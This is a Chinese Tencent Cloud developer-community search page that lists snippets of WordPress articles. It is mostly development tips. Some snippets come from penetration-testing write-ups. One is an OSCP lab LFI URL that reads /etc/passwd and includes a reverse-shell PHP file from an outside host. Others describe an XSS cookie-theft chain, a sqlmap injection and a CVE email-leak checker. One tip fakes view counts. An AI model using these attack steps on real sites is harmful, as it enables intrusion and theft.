如何在wordpress中获取插件目录url (ajax) - 腾讯云开发者社区

文章/答案/技术大牛

发布

去掉 WordPress 分类目录 URL 中的 category 最佳方法

WordPress 默认的分类目录 URL 中是带 category 的，比如我爱水煮鱼的 WordPress 的分类目录的 URL https://blog.wpjam.com/category/wordpress...有些用户博客的分类就是二级目录，希望去掉分类目录 URL 中的 category，如何操作呢？...方式一：使用插件网上有很多这方面功能的 WordPress 插件，都可以去掉分类目录 URL 中的 category，这些插件的实现方式是把所有的分类都写入 WordPress 的 rewrite 规则...方式二：设置分类目录前缀另外 WordPress 还有一个非常方便的方法，可以说是最简化去掉分类目录 URL 中的 category。...就可以：方式三：最佳方法如果仔细观察一下去掉 category 的分类目录 WordPress 的页面的 URL：去掉 category 的分类目录页面：https://blog.wpjam.com

1.3K4 0

如何在 WordPress 中获取最新被评论的文章列表

我之前的「WordPress 文章查询教程6：如何使用排序相关的参数」中详细介绍了文章查询的排序参数，其中介绍可以通过评论数进行排序： $query = new WP_Query( array(...'orderby' => 'comment_count' ) ); 但是需求总是不停的变化，现在又有了新需求，获取最新被评论的文章列表，意思就是某篇文章刚被评论，它就排到最前面，在某些社交需求的网站可能需要用到...$order}"; } return $clauses; }, 10, 2); 上面的代码简单解释一下，就是通过 posts_clauses 接口实现文章表和评论表连表，然后通过评论时间进行排序获取最新被评论的文章列表...当然你也可以不需要了解和使用上面的代码，因为 WPJAM Basic 已经整合，你只需要知道最后可以通过下面简单的方式就能够获取最新被评论的文章列表： $query = new WP_Query( array

4.7K3 0

您找到你想要的搜索结果了吗？

是的

没有找到

如何在WordPress网站中添加Cookie弹出窗口（不使用插件）

如何在WordPress网站中添加Cookie弹出窗口　　如果你是使用WordPress建站的用户，那么有可能你的网站已经在使用Cookie来收集访问者的数据，如果您没有在网站上显示任何同意Cookie...在这篇文章中，晓得博客为你详细介绍不适用插件如何在 WordPress 网站中添加Cookie弹出窗口。...不适用插件向WordPress网站添加Cookie通知　　向WordPress网站添加插件可能会减慢速度。因此，如果可能，最好限制插件安装并手动调整所有内容。...总结　　以上为不使用插件在WordPress网站中添加Cookie弹出窗口，现在，你已经学会了如何通过粘贴生成的代码来显示WordPress Cookie通知。...推荐：如何在WordPress网站中添加免费在线聊天功能-Chaty插件教程晓得博客，版权所有丨如未注明，均为原创晓得博客 » 如何在WordPress网站中添加Cookie弹出窗口（不使用插件）

6.1K3 0

WordPress面试题

下面是关于如何在 WordPress 源码中开发主题和插件的基本指南：开发 WordPress 主题：创建主题目录：在 WordPress 的wp-content/themes/目录下创建一个新的文件夹...基本结构：在index.php文件中，使用 WordPress 提供的函数来获取头部、尾部等页面结构。可以创建其他模板文件，如header.php、footer.php等，以更好地组织代码。...开发 WordPress 插件：创建插件目录：在 WordPress 的wp-content/plugins/目录下创建一个新的文件夹，该文件夹即为你的插件名称。...添加后台页面：使用add_menu_page等函数来添加插件在 WordPress 后台的菜单页面。在页面中添加表单和处理逻辑，如保存设置。...使用 Ajax：使用 WordPress 提供的 Ajax API 来处理异步请求，提升用户体验。安全性和错误处理：对插件进行安全性审查，确保用户输入的数据经过验证和过滤。

1.9K4 0

如何在回调函数中获取 WordPress 接口的当前优先级

下面开始教程：如何获取 Hook 优先级我们在 WordPress 进行开发的时候，肯定会使用到 WordPress 的 Hook，通过 add_filter 或者 add_action 把某个回调函数传递给某个...在回调函数中，我们可以通过 current_filter 函数可以获取当前回调函数是在执行那个 Hook 中，但是如果要获取当前回调函数优先级，WordPress 就没有相关的函数了，所以我自己写了一个...$hook->current_priority() : null; } 获取 Hook 优先级有什么用我们可能要移除接口的某个回调函数，然后最后又要加回来，怎么处理呢？...如果和我一样为了偷懒，这前后的移除和添加的回调函数是同一个，那就要在回调函数中判断当前的优先级了： function wpjam_filter_content_save_pre($content){...该功能已经整合到 WPJAM Basic 插件中，并已免费提供下载，简单勾选或者设置下即可开启！

1.7K3 0

使用 Nonce 防止 WordPress 网站受到 CSRF 攻击

攻击最好的方法，WordPress Nonce 通过提供一个随机数，来实现在数据请求（比如，在后台保存插件选项，AJAX 请求，执行其他操作等等）的时候防止未授权的请求。...wp_create_nonce() 函数创建 nonce： $nonce= wp_create_nonce('wpjam'); 然后将生成 $nonce 的值作为参数传递给请求中，如： "> 如果在 WordPress 后台页面，可以使用 check_admin_referer() 函数验证 nonce，它会自动从链接的查询参数中获取 nonce 并验证它： check_admin_referer...> jQuery.ajax({ type: "post", url: ajax_url, data: { action: 'weixin_share', share_type: share_type...); } }); 服务器处理代码： check_ajax_referer( "weixin_robot" ); WPJAM Basic 严格遵守 Nonce WPJAM Basic 插件以及 WordPress

1.9K1 0

靶场实战(19)：OSCP备考之VulnHub HA WORDY

使用命令wpscan --url http://172.16.33.108/wordpress/ --enumerate u扫描 WordPress 用户，发现admin和aarti用户。...使用命令wpscan --url http://172.16.33.108/wordpress/扫描 WordPress 插件，发现 7 个插件。...使用命令searchsploit -m 44340将 EXP 拷贝到当前目录后使用命令cat 44340.txt获得漏洞 URL，最终构造 URLhttp://172.16.33.108/wordpress...ajax_path=/etc/passwd在浏览器中访问，成功拿到/etc/passwd 文件，确认存在 LFI 本地文件包含漏洞。...ajax_path=http://10.8.0.110:8000/php-reverse-shell.php在浏览器中访问，结果报错{"success":false,"message":"Error:

4381 0

WordPress Plugin AutoSuggest插件SQL注入复现与分析

最近就看到了一个WordPress插件问题导致的SQL注入漏洞，抱着好奇的心，我就开始这个漏洞的复现与分析。...WP AutoSuggest简介 WP AutoSuggest 这款插件在访问者输入关键字时，插件会在提交搜索查询之前通过AJAX请求在网页中显示一些建议。...下载完成之后，把wp-autosuggest目录直接拖到Wordpress目录的\wp-content\plugins\下。 ? 接着，登录后台，启用这款插件，如下图所示： ?...通过SQLMAP，成功获取到服务器的一些信息，如下图所示： ? 下图也成功跑出了当前数据库的名称。 ? 漏洞分析分析WordPress插件的话还是挺容易的。...一点都没过滤，并且在之后的代码中（由于篇幅所限，后面的代码未全部贴出），变量wpas_keys也带入数据库中查询了（wpdb是wordpress操作数据库方法），于是SQL注入就产生了。 ?

1.3K2 0

WordPress插件大全

它是 WordPress 设置中理想的隐私探查工具。...Category Excluder – 建立一些浏览者没有权限浏览的分类目录。...AWSOM – 这个插件能让制作一篇“置顶”文章或留言。 asTunes – 获取Audioscrobbler或last.fm中的数据并以列表的形式发表到博客上。...这个插件可以友好地提供你站点上访问者需要的相关内容。 No WWW – 将所有含有www的URL都转向到无www的URL。 Optimal title – title优化插件。...Inline Ajax Comments – 在访问者点击前隐藏评论。 Inline Ajax Page – 允许用户在查看某篇日志前获取其摘要。

3K5 0

从瑞士军刀到变形金刚--XSS攻击面拓展

而在默认下载的Wordpress中，都会包含Hello Dolly插件，通过修改这个插件内容并启动插件，我们可以执行想要的任何代码。...但在这之前，我们首先要了解一下，wordpress关于csrf的防御机制，在wordpress中引入了_wpnonce作为判断请求来源的参数。...php /* Plugin Name: Hello Dolly Version: 1.6 */ 那么我们来构造完整的攻击请求 1、构造xss攻击链接->管理员点击->修改插件目录的hello.php->...启动hello, holly插件->访问首页->触发攻击 2、hello.php页面直接获取cookie发出。...在wordpress的插件yoast seo中，包含一个自带的功能可以修改整战根目录的.htaccess文件。

8401 0

Sticky Posts Switch插件教程WordPress中为分类添加置顶文章

Sticky Posts Switch插件教程WordPress中为分类添加置顶文章Sticky Posts Switch插件教程WordPress中为分类添加置顶文章　　默认情况下，WordPress...在本文中，我们晓得博客将向您展示如何在WordPress中为类别添加置顶文章。注意：Sticky Post仅适用于内置帖子类型帖子，不适用于自定义帖子类型。　　...和 MultilingualPress如何在WordPress中为类别添加置顶文章？　　...Sticky Posts Switch插件教程WordPress中为分类添加置顶文章　　此外还可以选择在主页、帖子存档页面或分类页面（如类别和标签）上显示粘性帖子的位置。...推荐：SearchWP Live Ajax Search插件教程WordPress添加Ajax搜索晓得博客，版权所有丨如未注明，均为原创晓得博客 » Sticky Posts Switch插件教程WordPress

8.1K2 0

WordPress 常量概述

值：true DOING_AJAX 如果是来自 AJAX 的请求，将被定义。值：true DOING_AUTOSAVE 当 WordPress 正在自动保存日志的时候，将被定义。...'/languages' WP_PLUGIN_DIR 插件目录的绝对路径。默认：WP_CONTENT_DIR.'/plugins' WP_PLUGIN_URL 插件目录的 url。...wp-content' WP_CONTENT_URL wp-content 目录的URL 默认：get_option('siteurl') ....'/wp-content' WP_HOME WordPress 的主页。 WP_SITEURL WordPress 根目录的 URL WP_TEMP_DIR 临时目录的绝对路劲。.../mu-plugins' WPMU_PLUGIN_URL 必须使用的插件目录的 URL 默认：WP_CONTENT_URL.'

1.7K2 0

EventON WordPress 插件未授权邮箱地址泄露检测工具

EventON WordPress 插件未授权邮箱地址泄露检测工具这是一个专为 WordPress 设计的专业安全检测工具，用于识别 EventON 插件中的严重安全漏洞。...该工具能自动检测目标站点是否存在 CVE-2024-0235 漏洞，该漏洞允许未经身份验证的攻击者通过特定的 AJAX 请求获取网站用户的邮箱地址。...命令行参数概览参数类型必填描述--url, -ustring是指定待检测的 WordPress 站点的基础 URL（例如 https://example.com）。核心代码1....import reimport requestsdef send_post_request(url): try: # 构造存在漏洞的 AJAX 请求 URL post_url...= f"{url}/wp-admin/admin-ajax.php?

601 0

渗透测试之黑白无常“续”

看见有Robots.txt文件，相信很多在做渗透测试的时候都是基于该文件寻找敏感目录或者敏感文件的，可是本次测试中，该文件并没有提供到有效的目录或者文件信息，但是却给予了管理员信息，导致尝试登陆后台的过程中进入后台...该插件目前已经活跃安装30万+。 ? 注意该插件版本最新版本是1.5.56，使用自定义版本插件下载的方法下载1.5.34版本。 ? 下载下来后先查看一下目录结构。 ?...先在互联网上检索一下，该插件是否存在漏洞，检索出来的信息都比较久远，或者就是低于当前版本，在CVE库中检索该插件信息。 ?...WordPress中的add_action是添加动作的，也就是添加到admin_ajax文件的，后面还拼装了一个$this->prefix参数，查看该参数的值。 ?...默认值为bwg，所以根据WordPress的规则这里拼出的URL应该就是： http://localhost/wordpress-5.2.3/wp-admin/admin-ajax.php?

2.4K1 0

WordPress Sphere 相关日志插件：Sphere It Plugin

Weblog Tools Collection 的 APAD: Sphere It Plugin 名称： Sphere It Plugin 插件页面： http://sphere.wordpress.com.../2007/03/31/sphere-it-plug-in-for-wordpressorg-bloggers/ 描述：在你的 WordPress blog 中增加一个 AJAX 特性的链接，并能从...评论： Sphere It 是一个易于使用和安装的插件。只用拉到你的插件目录，然后在控制的界面激活它。...这个插件可能会让你回想起社区网络化插件，如 Alex’s Share This，或者动态相关的条目插件，如 Waypath。我非常喜欢这个插件，很多大人物都在使用它哦。...单击 Sphere 图标，就会打开一个新的 AJAX 窗口，这个窗口中包含一些从讨论相同主题的其他 bloggers 和从博客世界和新的站点相似文章获取的文章列表。

3794 0

WordPress Fontsy Plugin SQL注入漏洞深度剖析与防御指南

该漏洞并非单一接口存在问题，而是涉及插件内多个AJAX交互接口，这些接口均面向未授权用户开放，无需验证身份即可访问，具体包括：get_fonts接口：用于获取字体列表，通过id参数传入查询条件get_tag_fonts...，既未限制参数的数据类型（如强制要求为整数），也未过滤参数中的特殊字符（如单引号、双引号、union、sleep等SQL注入关键字）。...SQL注入查询网站数据库中的所有数据，包括WordPress管理员账号密码（哈希值）、用户个人信息（姓名、邮箱、手机号）、网站内容（文章、页面、评论）等，后续可通过破解密码哈希值，获取管理员登录权限。...篡改网站数据：可修改数据库中的内容，如篡改网站首页文案、植入恶意广告、修改用户权限，甚至添加恶意管理员账号，实现对网站的间接控制。...（二）长期防护机制规范插件选用与更新：优先选用WordPress官方插件库（WordPress.org/plugins）中的插件，且选择下载量高、评分高、更新频繁的插件；定期检查插件更新，及时更新至最新版本

1091 0

WordPress 文章无法保存？试试这些实用修复技巧

二、插件冲突：功能强大≠没有副作用许多插件，尤其是安全类、SEO类、表单类插件，可能会通过钩子干扰 admin-ajax.php 的正常执行，导致返回非 JSON 内容。...排查方式：WordPress后台进入「插件」→ 全选并停用 → 测试是否能正常更新文章。若恢复正常，逐个启用插件，定位冲突来源。...（如 echo、var_dump()），或者自定义 AJAX 处理函数未正确输出 JSON 数据，都会破坏后台通信流程。...排查步骤：打开主题目录下的 functions.php 文件，检查是否有非法输出；切换至默认主题（如 Twenty Twenty-Four），测试是否恢复；若切换后正常，说明原主题存在问题，需进行代码审查...修复方法：检查 wp-config.php 中的通信密钥是否配置正确；暂时禁用相关安全插件或服务器 WAF，测试是否恢复。

4521 0

WordPress阅读量作弊随机增加教程

本教程是为了解决那些刚刚创建的网站，被访客浏览时，网站文章阅读量数字显示个位或是十位数的尴尬，以下内容只针对于主题安装或是集成了wp-postviews插件的wordpress主题，通过以下wordpress...插件的修改方法与wordpress主题的修改方法实现流量爆棚的效果。...*/ function cx_statistics_visitors( $cache = false ){ global $post; //页面判断 if(is_single()): //非缓存模式获取...> $(function(){ $.ajax({ type: 'GET', dataType: 'html', url: chenxing.ajax_url...update_post_meta($id,'views',($post_views +mt_rand(61, 367))); } endif; } function Bing_statistics_cache(){ //缓存模式获取文章

2.3K4 0

WordPress插件高危漏洞：Fancy Product Designer敏感信息泄露深度剖析

CVE-2025-13439: CWE-200 radykal Fancy Product Designer插件中向未授权参与者暴露敏感信息严重性：中类型：漏洞CVE-2025-13439WordPress...这是由于在fpd_custom_uplod_file AJAX操作的url参数中，对用户提供的输入验证不足，该参数未经清理直接流入了getimagesize()函数。...根本原因是在fpd_custom_uplod_file AJAX操作中对用户提供的url参数清理不足。...鉴于WordPress在欧洲的广泛使用以及产品定制插件在线零售中的普及，该威胁与许多行业相关，包括零售、制造业和数字服务。缓解建议监控插件供应商的官方补丁或更新，并在可用后立即应用。...使用具有自定义规则的Web应用程序防火墙（WAF）来检测和阻止针对fpd_custom_uplod_file操作或异常url参数值的可疑AJAX请求。

1370 0

WordPress二次开发之调用ajax

默认值：None $src：（可选）WordPress网站根目录下的JS路径。如：”/wp-includes/js/xxx.js”。...('my_test','ajax_object',array('ajax_url'=>admin_url('admin-ajax.php'))); } ......请求这里我们不能之间在admin-ajax.php中对ajax进行处理，这样做就是修改了核心文件观察 admin-ajax.php 发现其挂载了两个钩子wp_ajax_...和wp_ajax_nopriv...我们在初始化的时候将函数添加到这两个钩子上即可在插件中对ajax请求进行处理在构造函数中 public function __construct() { add_action(...('my_test','ajax_object',array('ajax_url'=>admin_url('admin-ajax.php'))); //处理ajax 钩子

1.3K1 0

点击加载更多

去掉 WordPress 分类目录 URL 中的 category 最佳方法

如何在 WordPress 中获取最新被评论的文章列表

如何在WordPress网站中添加Cookie弹出窗口（不使用插件）

WordPress面试题

如何在回调函数中获取 WordPress 接口的当前优先级

使用 Nonce 防止 WordPress 网站受到 CSRF 攻击

靶场实战(19)：OSCP备考之VulnHub HA WORDY

WordPress Plugin AutoSuggest插件SQL注入复现与分析

WordPress插件大全

从瑞士军刀到变形金刚--XSS攻击面拓展

Sticky Posts Switch插件教程WordPress中为分类添加置顶文章

WordPress 常量概述

EventON WordPress 插件未授权邮箱地址泄露检测工具

渗透测试之黑白无常“续”

WordPress Sphere 相关日志插件：Sphere It Plugin

WordPress Fontsy Plugin SQL注入漏洞深度剖析与防御指南

WordPress 文章无法保存？试试这些实用修复技巧

WordPress阅读量作弊随机增加教程

WordPress插件高危漏洞：Fancy Product Designer敏感信息泄露深度剖析

WordPress二次开发之调用ajax

相关资讯

热门标签

活动推荐

运营活动

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐